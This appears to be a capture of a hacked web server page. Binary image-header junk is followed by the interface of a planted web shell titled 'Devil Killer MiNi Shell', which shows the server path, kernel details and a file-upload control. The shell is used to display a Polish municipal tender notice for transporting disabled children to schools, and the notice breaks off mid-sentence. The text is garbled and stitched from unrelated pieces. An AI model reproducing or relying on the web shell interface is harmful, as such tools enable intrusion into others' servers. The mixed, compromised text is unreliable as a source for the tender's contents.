JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240718/0041851201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz dzieci niepełnosprawnych z terenu Gminy Świerklany do placówek oświatowych na terenie Rybnika, Żor, Wodzisławia Śląskiego i Raciborza </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Świerklany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276259008</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościelna 85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świerklany</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-266</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 43 27 521</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@swierklany.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://swierklany.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz dzieci niepełnosprawnych z terenu Gminy Świerklany do placówek oświatowych na terenie Rybnika, Żor, Wodzisławia Śląskiego i Raciborza </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d0e7dbbe-7226-45fb-ba20-dcf2cd7028a9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00418512</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00022918/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przewóz dzieci niepełnosprawnych z terenu Gminy Świerklany do placówek oświatowych na terenie Rybnika, Żor i Wodzisławia Śląskiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d0e7dbbe-7226-45fb-ba20-dcf2cd7028a9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">15.2.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu:<br/>15.2.1.	Platformy e-Zamówienia, która jest dostępna pod adresem: https://ezamowienia.gov.pl <br/>15.2.2.	poczty elektronicznej: przetargi@swierklany.pl (nie dotyczy składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">15.4.	Komunikacja w postępowaniu o udzielenie zamówienia (z wyłączeniem składania ofert) odbywa się drogą elektroniczną za pośrednictwem:<br/>15.4.1.	„Formularzy do komunikacji” dostępnych na Platformie e-Zamówienia w zakładce „Formularze”. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza), lub:<br/>15.4.2.	poczty elektronicznej na adres e-mail: przetargi@swierklany.pl Podczas komunikacji za pośrednictwem poczty elektronicznej Zamawiający lub Wykonawca na żądanie drugiej strony niezwłocznie potwierdza fakt otrzymania wiadomości. W przypadku niepotwierdzenia ze strony Wykonawcy odbioru przesłanych wiadomości (pomimo takiego żądania ze strony Zamawiającego) Zamawiający uzna, że wiadomość została skutecznie przekazania do Wykonawcy. <br/>Wykonawca, jako podmiot profesjonalny, ma obowiązek sprawdzania poczty elektronicznej wskazanej przez niego w Formularzu Oferty, gdyż korespondencja od Zamawiającego może trafić do folderu SPAM.<br/>15.5.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu<br/>15.6.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu 22 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony w zakładce „Zgłoś problem” https://ezamowienia.gov.pl/soz/latest-faq<br/>15.7.	Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w:<br/>15.7.1.	rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U.2020.2452),<br/>15.7.2.	rozporządzeniu Ministra Rozwoju, Pracy i technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U.2020.2415 ze zm.).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">klauzula informacyjna została zawarta w pkt. 28.13. SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">klauzula informacyjna została zawarta w pkt. 28.13. SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RI.271.5.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	W części 1 przedmiotem zamówienia jest świadczenie usługi w zakresie transportu i opieki podczas przewozu niepełnosprawnych dzieci z terenu Gminy Świerklany do placówek oświatowych w Rybniku i z powrotem do najbliższego miejscu zamieszkania dziecka przystanku, organizowany w dni zajęć dydaktyczno-wychowawczych w roku szkolnym 2024/2025 dla ok. 14 uczniów.<br/><br/>4.1.1.	Szkoły/przedszkola, do których dowożone będą dzieci:<br/>a)	Zespół Szkół nr 6, ul. Małachowskiego 145, Rybnik<br/>b)	Specjalny Ośrodek Szkolno-Wychowawczy, ul. Piasta 35, Rybnik<br/>c)	Zespół Szkół nr 3, ul. Orzepowicka15A, Rybnik<br/>4.1.2.	Przystanki:<br/>Przystanki zlokalizowane będą w miarę możliwości najbliżej miejsca zamieszkania dziecka. Dokładne rozmieszczenie przystanków, jak również trasy i godziny odjazdów samochodów dowożących dzieci zostaną uzgodnione z wybranym Wykonawcą po podpisaniu Umowy i po sporządzeniu planów zajęć w poszczególnych placówkach oświatowych. <br/>Orientacyjna trasa:<br/>ul. Spacerowa x Przemysłowa, Świerklany<br/>ul. Łokietka, Świerklany<br/>ul. Warneńczyka, Świerklany<br/>ul. 3 Maja, Świerklany Szkoła nr 2<br/>ul. Rybnicka Świerklany, Piekarnia GS<br/>ul. Piaskowa, Jankowice<br/>ul. Spokojna, Jankowice<br/>ul. Górnicza, Jankowice<br/>ul. Wesoła, Jankowice<br/>ul. Hoły, Jankowice<br/>ul. Kościelna, Jankowice<br/>ul. Korfantego, Jankowice<br/>ul. Małachowskiego 145, Rybnik (Zespół Szkół nr 6)<br/>ul. Piasta 35, Rybnik (Specjalny Ośrodek Szkolno-Wychowawczy)<br/>ul. Orzepowicka 15A, Rybnik (Zespół Szkół nr 3)<br/>4.1.3.	Termin i czas realizacji usługi:<br/>a)	usługa będzie wykonywana w dni zajęć dydaktyczno-wychowawczych w okresie od 3 września 2024 r. do 27 czerwca 2025 r. <br/>b)	transport dzieci do placówek oświatowych określonych w pkt. 4.1.1. winien odbywać się w godzinach od 6,oo do 9,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego. Dzieci powinny być dowiezione do szkoły/przedszkola w takim czasie, aby mogły punktualnie rozpocząć zajęcia lekcyjne zgodnie z obowiązującym je szkolnym planem lekcji/zajęciami w przedszkolu.<br/>c)	transport dzieci z wyznaczonych placówek oświatowych do przystanków, określonych w pkt. 4.1.2. winien odbywać się w godzinach od 14,oo do 17,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego.<br/>4.1.4.	Wymagania wobec pojazdu, którym wykonywana będzie usługa:<br/>a)	Wykonawca składający ofertę musi wykazać, że w celu realizacji zamówienia będzie dysponował co najmniej jednym pojazdem z liczbą miejsc:<br/>	osoby na wózkach inwalidzkich	2 <br/>	osoby niepełnosprawne 12 <br/>	opiekun<br/>	kierowca<br/>b)	siedzenia dla dzieci winny być wyposażone w bezwładnościowe pasy bezpieczeństwa. <br/>c)	pojazd powinien być wyposażony w podnośnik hydrauliczny lub rampę najazdową.<br/>4.1.5.	Obowiązki Wykonawcy:<br/>a)	pojazdy używane do transportu dzieci niepełnosprawnych muszą być przystosowane do przewozu dzieci niepełnosprawnych zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym, ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym oraz przepisami wykonawczymi do ustaw.<br/>b)	Wykonawca jest zobowiązany do wyposażenia pojazdu w środki łączności – telefon komórkowy.<br/>c)	Wykonawca winien dysponować kierowcami posiadającymi odpowiednie kwalifikacje zawodowe. Przed rozpoczęciem wykonywania przewozów Wykonawca poda Zamawiającemu dane osobowe kierowców w zakresie niezbędnym do weryfikacji kierowców w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości.<br/>d)	Wymaga się by przewóz dzieci był realizowany pod opieką opiekuna, który nie może być jednocześnie kierowcą. <br/>Wymagania wobec opiekuna zatrudnionego w dowozie przez Wykonawcę: opiekunem winna być osoba dorosła, sprawna fizycznie, przeszkolona z zakresu udzielania pierwszej pomocy przedmedycznej, nie figurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości oraz dająca rękojmię bezpiecznego i komfortowego dojazdu dzieci do szkół i przedszkoli. <br/>Wykonawca musi dysponować tyloma różnymi opiekunami, na ile części składa ofertę.<br/>Obowiązki opiekuna:<br/>	opiekun jest odpowiedzialny za bezpieczeństwo uczniów w trakcie wsiadania i wysiadania ze środka transportu oraz w trakcie przejazdu,<br/>	w trakcie wykonywania czynności ściśle współpracuje z kierowcą pojazdu,<br/>	w trakcie wsiadania/wysiadania uczniów, po zatrzymaniu pojazdu, otwiera drzwi i wychodzi na zewnątrz i sprawdza, czy w miejscu wsiadania nie występują jakiekolwiek zagrożenia, jeśli nie występują zagrożenia zezwala na wejście/wyjście z pojazdu,<br/>	w trakcie przewozu opiekun na bieżąco kontroluje ład i bezpieczeństwo w pojeździe, podejmując skuteczną interwencję w razie jego naruszenia (bez użycia siły fizycznej i przemocy psychicznej). W przypadku stwierdzenia sytuacji zagrażającej dzieciom nakazuje się natychmiastowe poinformowanie o tym fakcie Zamawiającego i Wykonawcę,<br/>	opiekun jest zobowiązany do odprowadzenia podopiecznych do drzwi budynku placówki oświatowej podczas przywozu, a podczas odbioru do odebrania spod drzwi budynku placówki oświatowej. Nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkoły do domu osobom nieupoważnionym.<br/>e)	Wykonawca ponosi pełną odpowiedzialność za zapewnienie bezpiecznych i higienicznych warunków transportu dzieci i ich opiekuna oraz zobowiązuje się do ubezpieczenia pasażerów od następstw nieszczęśliwych wypadków i poniesienia związanych z tym kosztów.<br/>f)	w razie awarii pojazdu Wykonawca winien zapewnić pojazd zastępczy spełniający wymagania określone w pkt. 4.1.4.<br/>4.1.6.	Przewidywana liczba kilometrów trasy przewozu dzieci:<br/>a)	łączna trasa dzienna przejazdu pojazdu będzie wynosiła średnio ok. 70 km.<br/>b)	planowana liczba dni wykonywania usługi w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie 188 dni. <br/>c)	łączna liczba kilometrów w okresie od 3 września 2024 r. do 27 czerwca 2025 r. wyniesie ok. 13.160 km.<br/>4.1.7.	Sposób realizacji usługi:<br/>a)	Zamawiający wymaga by przewóz dzieci był realizowany przez Wykonawcę, który posiada licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym. W przypadku gdy ofertę złożą podmioty wspólnie ubiegające się o udzielenie zamówienia, ww. licencją winien legitymować się ten członek konsorcjum, który świadczył będzie usługę transportową.<br/>b)	transport dzieci może odbywać się tylko z opiekunem, którego zapewnia Wykonawca.<br/>4.1.8.	Cena przedmiotu zamówienia:<br/>a)	oferowana cena za 1 dzień przewozu obejmować winna transport dzieci, postój, pomoc w wejściu i wyjściu z pojazdu.<br/>b)	za wykonane usługi przewozowe wybrany Wykonawca otrzyma wynagrodzenie obliczone wg wzoru: <br/>liczba dni przewozu x cena za 1 dzień przewozu netto + 8% VAT </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-03 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">23.1.	Zamawiający dokona oceny ofert, które nie podlegają odrzuceniu na podstawie art. 226 ust. 1 Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.2.	W części 2 przedmiotem zamówienia jest świadczenie usługi w zakresie transportu i opieki podczas przewozu niepełnosprawnych dzieci z terenu Gminy Świerklany do placówek oświatowych w Żorach i z powrotem do najbliższego miejscu zamieszkania dziecka przystanku, organizowany w dni zajęć dydaktyczno-wychowawczych w roku szkolnym 2024/2025 dla ok. 7 uczniów.<br/>4.2.1.	Szkoły/przedszkola, do których dowożone będą dzieci:<br/>a)	Szkoła Podstawowa HORYZONT, ul. Szeroka 1A, Żory<br/>b)	Zespół Szkół Specjalnych, ul. Boryńska 54, Żory<br/>c)	OREW, ul. Piastów Górnośląskich 8, Żory<br/>4.2.2.	Przystanki:<br/>Przystanki zlokalizowane będą w miarę możliwości najbliżej miejsca zamieszkania dziecka. Dokładne rozmieszczenie przystanków, jak również trasy i godziny odjazdów samochodów dowożących dzieci zostaną uzgodnione z wybranym Wykonawcą po podpisaniu Umowy i po sporządzeniu planów zajęć w poszczególnych placówkach oświatowych. <br/>Orientacyjna trasa:<br/>ul. Kościelna, Jankowice<br/>ul. Przyjemna, Jankowice<br/>ul. Piaskowa, Jankowice<br/>ul. Boryńska, Świerklany<br/>ul. Piastów Górnośląskich 8, Żory<br/>ul. Boryńska 54, Żory (Zespół Szkół Specjalnych)<br/>ul. Szeroka 1A (Horyzont)<br/>4.2.3.	Termin i czas realizacji usługi:<br/>a)	usługa będzie wykonywana w dni zajęć dydaktyczno-wychowawczych w okresie od 2 września 2024 r. do 27 czerwca 2025 r. <br/>b)	transport dzieci do placówek oświatowych określonych w pkt. 4.2.1. winien odbywać się w godzinach od 6,oo do 9,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego. Dzieci powinny być dowiezione do szkoły/przedszkola w takim czasie, aby mogły punktualnie rozpocząć zajęcia lekcyjne zgodnie z obowiązującym je szkolnym planem lekcji/zajęciami w przedszkolu.<br/>c)	transport dzieci z wyznaczonych placówek oświatowych do przystanków, określonych w pkt. 4.2.2. winien odbywać się w godzinach od 14,oo do 17,oo, zgodnie z harmonogramem ustalonym przez Wykonawcę z osobą odpowiedzialną ustanowioną przez Zamawiającego.<br/>4.2.4.	Wymagania wobec pojazdu, którym wykonywana będzie usługa:<br/>a)	Wykonawca składający ofertę musi wykazać, że w celu realizacji zamówienia będzie dysponował co najmniej jednym pojazdem z liczbą miejsc:<br/>	osoby na wózkach inwalidzkich	2 <br/>	osoby niepełnosprawne 5<br/>	opiekun<br/>	kierowca<br/>UWAGA: 1 wózek jest dla osoby pełnoletniej, o gabarytach większych niż standardowe wózki inwalidzkie.<br/>b)	siedzenia dla dzieci winny być wyposażone w bezwładnościowe pasy bezpieczeństwa. <br/>c)	pojazd powinien być wyposażony w podnośnik hydrauliczny lub rampę najazdową.<br/>4.2.5.	Obowiązki Wykonawcy:<br/>a)	pojazdy używane do transportu dzieci niepełnosprawnych muszą być przystosowane do przewozu dzieci niepełnosprawnych zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym, ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym oraz przepisami wykonawczymi do ustaw.<br/>b)	Wykonawca jest zobowiązany do wyposażenia pojazdu w środki łączności – telefon komórkowy.<br/>c)	Wykonawca winien dysponować kierowcami posiadającymi odpowiednie kwalifikacje zawodowe. Przed rozpoczęciem wykonywania przewozów Wykonawca poda Zamawiającemu dane osobowe kierowców w zakresie niezbędnym do weryfikacji kierowców w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości.<br/>d)	Wymaga się by przewóz dzieci był realizowany pod opieką opiekuna, który nie może być jednocześnie kierowcą. <br/>Wymagania wobec opiekuna zatrudnionego w dowozie przez Wykonawcę: opiekunem winna być osoba dorosła, sprawna fizycznie, przeszkolona z zakresu udzielania pierwszej pomocy przedmedycznej, nie figurująca w Rejestrze Sprawców Przestępstw na Tle Seksualnym prowadzonym przez Ministra Sprawiedliwości oraz dająca rękojmię bezpiecznego i komfortowego dojazdu dzieci do szkół i przedszkoli. <br/>Wykonawca musi dysponować tyloma różnymi opiekunami, na ile części składa ofertę.<br/>Obowiązki opiekuna:<br/>	opiekun jest odpowiedzialny za bezpieczeństwo uczniów w trakcie wsiadania i wysiadania ze środka transportu oraz w trakcie przejazdu,<br/>	w trakcie wykonywania czynności ściśle współpracuje z kierowcą pojazdu,<br/>	w trakcie wsiadania/wysiadania uczniów, po zatrzymaniu pojazdu, otwiera drzwi i wychodzi na zewnątrz i sprawdza, czy w miejscu wsiadania nie występują jakiekolwiek zagrożenia, jeśli nie występują zagrożenia zezwala na wejście/wyjście z pojazdu,<br/>	w trakcie przewozu opiekun na bieżąco kontroluje ład i bezpieczeństwo w pojeździe, podejmując skuteczną interwencję w razie jego naruszenia (bez użycia siły fizycznej i przemocy psychicznej). W przypadku 